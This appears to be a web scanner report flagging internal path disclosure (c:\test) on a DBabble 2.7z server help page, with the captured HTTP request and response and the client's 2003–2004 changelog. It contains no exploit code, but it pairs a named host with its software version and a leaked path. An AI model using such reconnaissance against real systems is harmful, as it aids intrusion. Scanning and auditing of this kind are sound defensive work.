Fixed bug where importing AIM buddy lists would not work in some situations. </li> <li> In instant message chat mode, it now does not display the full user name after the first chat message from each user in order to make it easier to read. </li> </ul><hr> <font color="green"><b>Version 2.5c (Tue, Aug 5 2003)</b></font><br><br> <font color="green">New features in version 2.5c</font> <ul> <li> Added an instant message chat mode (click the chat mode button when composing an instant message). This means that when you send a message the window does not disappear from your screen, and you can see recent replies to the message in the same window. This feature works with multiple recipients and with user groups. You can optionally see text as other users type it. This feature replaces the private conversation feature in previous versions and is better in that it works with multiple recipients and with gateway (ICQ, MSN) and email users and supports client to client encryption. When communicating with gateway users chat mode (rather than message mode) is now the default communication method. </li> <li> Added better instant message reply options, so that if someone sends a message to a user group which they are not a member of, then when you choose to reply to all recipients, then sender is included in the recipients of the reply. </li> <li> Added instant message folders so you can file important instant messages to make them easier to find later. </li> <li> Added options in forum windows to select whether you want to be sent email and/or instant message copies of all articles posted to the forum. </li> <li> When sending an instant message to a user who is not on your contacts list you are now asked if you want them added to your contacts list. There is a checkbox option to not display this message in future. </li> <li> If you try to send an instant message larger than the maximum size allowed (20K) you are now asked if you want to send it as an attachment instead. </li> <li> After you download an instant message attachment from the server it now asks you if you want the attachment deleted from the server. There are options to automatically delete attachments from the server after downloading and to never delete attachments from the server after downloading. </li> <li> When adding a user group to the recipients of an instant message, the options to send only to all recipients or online recipients are now displayed. </li> <li> Added 'reply to discussion' and 'reply to sender' buttons in forum window </li> <li> Added forum option to open the forum with all threads expanded. </li> <li> In forums, added 'expand all threads' and 'contract all threads' menu options. </li> <li> Added option to expand forum threads on double click. </li> <li> In forums, added option to only display threads that contain unread articles. </li> <li> Added option to mark forum threads as watched and added option to only display watched threads. </li> <li> Added option to ignore forum threads which means any articles in such threads will not be visible to you in future unless you turn on the option to show ignored threads. Additionally if you choose to receive instant message or email copies of articles posted to the forum then you won't receive those posted to threads you are ignoring. </li> <li> When downloading additional forum items the currently selected article remains selected in this version. </li> <li> Added retry button when downloading an attachment fails due to a lost connection. When you click the retry button the download will continue from where it was up to. </li> <li> Added option to save all attachments at once in a single message rather than having to save them all one at a time. </li> </ul> <font color="green">Problems fixed in version 2.5c</font> <ul> <li> None </li> </ul><hr> <font color="green"><b>Version 2.4r (Wed, Jul 9 2003)</b></font><br><br> <font color="green">New features in version 2.4r</font> <ul> <li> None </li> </ul> <font color="green">Problems fixed in version 2.4r</font> <ul> <li> Fixed bug that could crash program when pressing a hot key in the main window in versions 2.4e and later. </li> </ul><hr> <font color="green"><b>Version 2.4n (Tue, Apr 15 2003)</b></font><br><br> <font color="green">New features in version 2.4n</font> <ul> <li> None </li> </ul> <font color="green">Problems fixed in version 2.4n</font> <ul> <li> Fixed bug where your idle/offline time could appear wrong on the server in rare situations </li> </ul><hr> <font color="green"><b>Version 2.4k (Mon, Apr 14 2003)</b></font><br><br> <font color="green">New features in version 2.4k</font> <ul> <li> Added support for communicating with users on other instant messaging protocols (ICQ, MSN, Yahoo, AIM). You must have an existing account on each of these protocols and you can specify it in your preferences so that you are automatically connected to these protocols whenever you connect to DBabble. </li> <li> Improved performance when using a large background image. </li> <li> Added system wide hot key preferences for searching old instant messages and for setting state to idle. </li> <li> Changed column sorting header arrows to point in the same direction as they would for Microsoft products. There is now an 'invert sorting arrows' preference to make them point in the direction they pointed in previous versions </li> <li> Added option to automatically set state to idle when using a full screen application. Also added option to not be notified about new messages (or only particular priority messages) while using a full screen application </li> <li> When viewing user group members, it now lists the unique user n..
- /help/English/Standard/changes.htm

/help/English/Standard/changes.htm

http://smtp.netwin.co.nz:8132/help/English/Standard/changes.htm

Identified Internal Path(s)

c:\test

Request

GET /help/English/Standard/changes.htm HTTP/1.1
Referer: http://smtp.netwin.co.nz:8132/help/English/Standard/contents.htm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: smtp.netwin.co.nz:8132
Cookie: TEMPLATE=Standard; LANG=Deutsch(German)
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: DBabble 2.7z
Content-Length: 49100
Connection: close
MIME-version: 1.0
Date: Fri, 22 Apr 2011 00:22:32 GMT
Content-Type: text/html


<html><head><STYLE TYPE="text/css"><!-- BODY {font-size:10pt;} TD {font-size:10pt;} INPUT {font-size:9pt;} SELECT {font-size:8pt;} TEXTAREA {font-size:10pt;} TH {font-size:10pt;} FONT {font-size:10pt;}--></STYLE><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>DBabble Windows Client Changes</title></head><body BACKGROUND="/img/whttxtr2.jpg" onload="window.focus()"><table width="100%" cellpadding=0 cellspacing=1 border=0 bgcolor="black"><tr align=center><td nowrap height=20 border=1 align=center style="padding-right:10px;padding-left:10px;" bgcolor="khaki"><font color="black">DBabble Help</font><spacer type="block" width=10px></td><td nowrap height=20 border=1 align=center style="padding-right:10px;padding-left:10px;" bgcolor="steelblue"><a href="javascript:window.close()"><font color="white">Close Help</font></a><spacer type="block" width=10px></td><td nowrap height=20 border=1 align=center style="padding-right:10px;padding-left:10px;" bgcolor="steelblue"><a href="contents.htm"><font color="white">Help Contents</font></a><spacer type="block" width=10px></td><td nowrap height=20 border=1 align=center style="padding-right:10px;padding-left:10px;" bgcolor="steelblue"><a href="search.htm"><font color="white">Help Search</font></a><spacer type="block" width=10px></td><td bgcolor="steelblue" width="100%">&nbsp;</td></tr></table><font color="black"><h4>DBabble Windows Client Changes</h4></font>Below is a list of new features and problems fixed in recent versions of the DBabble Windows client.To upgrade from an older version of the Windows client, right click on the icon in the system tray (by the clock) and choose the upgrade option.You will be automatically notified when new versions are available if you have the "Tell me when upgrades are available" option on in your preferences.<hr> <font color="green"><b>Version 2.7w (Tue, Aug 17 2004)</b></font><br><br> <font color="green">New features in version 2.7w</font> <ul> <li> None </li> </ul> <font color="green">Problems fixed in version 2.7w</font> <ul> <li> Fixed a memory leak bug that could occasionally happen when connected to ICQ, MSN, etc gateway servers. In rare situations this could cause DBabble to hang (stop working). </li> </ul><hr> <font color="green"><b>Version 2.7u (Tue, Aug 10 2004)</b></font><br><br> <font color="green">New features in version 2.7u</font> <ul> <li> None </li> </ul> <font color="green">Problems fixed in version 2.7u</font> <ul> <li> Fixed bug in 2.7s where a web page embedded at the top of a chat room window did not work. </li> </ul><hr> <font color="green"><b>Version 2.7s (Wed, Aug 4 2004)</b></font><br><br> <font color="green">New features in version 2.7s</font> <ul> <li> Added option (default on) so that the button image is highlighted when the mouse is hovering over it. </li> </ul> <font color="green">Problems fixed in version 2.7s</font> <ul> <li> Fixed bug where choosing to save all attachments to a folder that does not exist saves them into the default 'documents and settings' folder. </li> <li> Fixed printing bug where tab characters were not being correctly printed. </li> <li> Fixed bug where the login window could remain visible but disabled after you logged in in some situations. </li> <li> Fixed bug where the send button in the online support chat window had a blank caption. </li> <li> Fixed bug where changing your user details in your preferences would sometimes leave ugly gray boxes in the window. </li> </ul><hr> <font color="green"><b>Version 2.7q (Wed, Jul 14 2004)</b></font><br><br> <font color="green">New features in version 2.7q</font> <ul> <li> None </li> </ul> <font color="green">Problems fixed in version 2.7q</font> <ul> <li> Fixed rare crash bug caused when creating a reminder for a deleted message. </li> </ul><hr> <font color="green"><b>Version 2.7h (Thu, May 20 2004)</b></font><br><br> <font color="green">New features in version 2.7h</font> <ul> <li> None </li> </ul> <font color="green">Problems fixed in version 2.7h</font> <ul> <li> Fixed a few minor bugs </li> </ul><hr> <font color="green"><b>Version 2.7e (Tue, May 11 2004)</b></font><br><br> <font color="green">New features in version 2.7e</font> <ul> <li> None </li> </ul> <font color="green">Problems fixed in version 2.7e</font> <ul> <li> Fixed a few minor bugs </li> </ul><hr> <font color="green"><b>Version 2.6k (Mon, Feb 9 2004)</b></font><br><br> <font color="green">New features in version 2.6k</font> <ul> <li> None </li> </ul> <font color="green">Problems fixed in version 2.6k</font> <ul> <li> Fixed minor bug in 2.6h - pressing a button and moving mouse away before releasing button would click the button when it shouldn't have. </li> <li> If your machine supports 256 colors or less, then the background image preferences defaults to off due to it not looking good and causing performance problems. </li> <li> Fixed problem where replying to a sent message or a message to multiple recipients would refer to the user by their user-id instead of user-name for encryption certificate purposes. </li> </ul><hr> <font color="green"><b>Version 2.6h (Wed, Jan 14 2004)</b></font><br><br> <font color="green">New features in version 2.6h</font> <ul> <li> When sending a message to a gateway user who is on your contacts list, it now displays their online status at the top of the window. </li> <li> Added immediate reconnect preference so that if your connection to the server is lost it will try to reconnect immediately. Useful if your ISP does not allow connections to remain open for more than a few minutes. </li> </ul> <font color="green">Problems fixed in version 2.6h</font> <ul> <li> Fixed problem with MSN communication showing your name as "(NULL)" to other users in some situations. If you are already using MSN through DBabble then in the preferences window, you may need to delete your MSN name/password in DBabble, click apply, then enter them again to make this fix take effect. </li> <li> Fixed problem with the 'start in chat mode with gateway users' preference not always working. </li> <li> Fixed bug where instant message headers could continuously flicker in very rare situations. </li> <li> Fixed problem where some animated gif images would not display correctly. </li> <li> Fixed bug that could crash DBabble in rare situations when upgrading to a new version. If this happens while upgrading you should shut down your existing version and download the new version from your DBabble server web page (e.g. http://domain.name.com:8132 where you replace domain.name.com with your DBabble server domain name) and install that over the top of your old version. Your existing preferences and settings will be maintained. </li> </ul><hr> <font color="green"><b>Version 2.6e (Wed, Nov 19 2003)</b></font><br><br> <font color="green">New features in version 2.6e</font> <ul> <li> Added support for connecting to the server through a proxy server using SSL (encrypted communication). </li> <li> Added forum and chat room option to automatically open the window on startup. </li> <li> Added option to dock chat room windows to the main window and a preference to automatically dock newly open chat room windows. </li> <li> Added option to only display contacts and subscribed discussions in old instant message user list. </li> </ul> <font color="green">Problems fixed in version 2.6e</font> <ul> <li> Fixed warning display about message not being signed for instant message copies of articles posted to forums. </li> </ul><hr> <font color="green"><b>Version 2.5r (Wed, Oct 22 2003)</b></font><br><br> <font color="green">New features in version 2.5r</font> <ul> <li> None </li> </ul> <font color="green">Problems fixed in version 2.5r</font> <ul> <li> Fixed minor bugs and improved performance for some features. </li> </ul><hr> <font color="green"><b>Version 2.5q (Tue, Oct 7 2003)</b></font><br><br> <font color="green">New features in version 2.5q</font> <ul> <li> Added chat room option to not be notified when users enter the chat room while the window is not focussed </li> <li> Added 'Start in chat mode with user groups' preference. </li> </ul> <font color="green">Problems fixed in version 2.5q</font> <ul> <li> Fixed chat room bug where it would scroll down on every refresh when connecting through a proxy server </li> <li> Upgraded to OpenSSL 0.9.7c to fix encrypted communication security bugs. </li> </ul><hr> <font color="green"><b>Version 2.5i (Mon, Sep 1 2003)</b></font><br><br> <font color="green">New features in version 2.5i</font> <ul> <li> None </li> </ul> <font color="green">Problems fixed in version 2.5i</font> <ul> <li> Fixed problem where program could crash in rare situations when upgrading to a new version </li> <li> Fixed bug (in versions 2.5c and later) where typing the letters r, k, or w in the forum search box would not work due to those characters being treated as hot keys. </li> <li> Fixed bug that could cause received attachments to be saved to disk as empty files. </li> </ul><hr> <font color="green"><b>Version 2.5f (Tue, Aug 26 2003)</b></font><br><br> <font color="green">New features in version 2.5f</font> <ul> <li> Added status options in the system tray right click menu to set your state to idle/offline until you move the mouse. </li> <li> Added status options for whether you are available for online support (only applies if the server administrator allows guest users on your server) </li> <li> Added option to not notify you about partial typing in private conversation windows. </li> </ul> <font color="green">Problems fixed in version 2.5f</font> <ul> <li> Fixed bug that happened if you tried to send an instant message larger than 20K in size. It would ask you if you wanted to send it as an attachment instead, but if you choose yes it would not work. </li> <li> Fixed bug where sending a digitally signed instant message with an attachment to an email address would include the attachment signature as part of the attachment data in the email. </li> </ul><hr> <font color="green"><b>Version 2.5e (Mon, Aug 11 2003)</b></font><br><br> <font color="green">New features in version 2.5e</font> <ul> <li> None </li> </ul> <font color="green">Problems fixed in version 2.5e</font> <ul> <li> When you save an encrypted instant message to disk it now decrypts the message before saving it. </li> <li> Fixed bug where importing AIM buddy lists would not work in some situations. </li> <li> In instant message chat mode, it now does not display the full user name after the first chat message from each user in order to make it easier to read. </li> </ul><hr> <font color="green"><b>Version 2.5c (Tue, Aug 5 2003)</b></font><br><br> <font color="green">New features in version 2.5c</font> <ul> <li> Added an instant message chat mode (click the chat mode button when composing an instant message). This means that when you send a message the window does not disappear from your screen, and you can see recent replies to the message in the same window. This feature works with multiple recipients and with user groups. You can optionally see text as other users type it. This feature replaces the private conversation feature in previous versions and is better in that it works with multiple recipients and with gateway (ICQ, MSN) and email users and supports client to client encryption. When communicating with gateway users chat mode (rather than message mode) is now the default communication method. </li> <li> Added better instant message reply options, so that if someone sends a message to a user group which they are not a member of, then when you choose to reply to all recipients, then sender is included in the recipients of the reply. </li> <li> Added instant message folders so you can file important instant messages to make them easier to find later. </li> <li> Added options in forum windows to select whether you want to be sent email and/or instant message copies of all articles posted to the forum. </li> <li> When sending an instant message to a user who is not on your contacts list you are now asked if you want them added to your contacts list. There is a checkbox option to not display this message in future. </li> <li> If you try to send an instant message larger than the maximum size allowed (20K) you are now asked if you want to send it as an attachment instead. </li> <li> After you download an instant message attachment from the server it now asks you if you want the attachment deleted from the server. There are options to automatically delete attachments from the server after downloading and to never delete attachments from the server after downloading. </li> <li> When adding a user group to the recipients of an instant message, the options to send only to all recipients or online recipients are now displayed. </li> <li> Added 'reply to discussion' and 'reply to sender' buttons in forum window </li> <li> Added forum option to open the forum with all threads expanded. </li> <li> In forums, added 'expand all threads' and 'contract all threads' menu options. </li> <li> Added option to expand forum threads on double click. </li> <li> In forums, added option to only display threads that contain unread articles. </li> <li> Added option to mark forum threads as watched and added option to only display watched threads. </li> <li> Added option to ignore forum threads which means any articles in such threads will not be visible to you in future unless you turn on the option to show ignored threads. Additionally if you choose to receive instant message or email copies of articles posted to the forum then you won't receive those posted to threads you are ignoring. </li> <li> When downloading additional forum items the currently selected article remains selected in this version. </li> <li> Added retry button when downloading an attachment fails due to a lost connection. When you click the retry button the download will continue from where it was up to. </li> <li> Added option to save all attachments at once in a single message rather than having to save them all one at a time. </li> </ul> <font color="green">Problems fixed in version 2.5c</font> <ul> <li> None </li> </ul><hr> <font color="green"><b>Version 2.4r (Wed, Jul 9 2003)</b></font><br><br> <font color="green">New features in version 2.4r</font> <ul> <li> None </li> </ul> <font color="green">Problems fixed in version 2.4r</font> <ul> <li> Fixed bug that could crash program when pressing a hot key in the main window in versions 2.4e and later. </li> </ul><hr> <font color="green"><b>Version 2.4n (Tue, Apr 15 2003)</b></font><br><br> <font color="green">New features in version 2.4n</font> <ul> <li> None </li> </ul> <font color="green">Problems fixed in version 2.4n</font> <ul> <li> Fixed bug where your idle/offline time could appear wrong on the server in rare situations </li> </ul><hr> <font color="green"><b>Version 2.4k (Mon, Apr 14 2003)</b></font><br><br> <font color="green">New features in version 2.4k</font> <ul> <li> Added support for communicating with users on other instant messaging protocols (ICQ, MSN, Yahoo, AIM). You must have an existing account on each of these protocols and you can specify it in your preferences so that you are automatically connected to these protocols whenever you connect to DBabble. </li> <li> Improved performance when using a large background image. </li> <li> Added system wide hot key preferences for searching old instant messages and for setting state to idle. </li> <li> Changed column sorting header arrows to point in the same direction as they would for Microsoft products. There is now an 'invert sorting arrows' preference to make them point in the direction they pointed in previous versions </li> <li> Added option to automatically set state to idle when using a full screen application. Also added option to not be notified about new messages (or only particular priority messages) while using a full screen application </li> <li> When viewing user group members, it now lists the unique user n..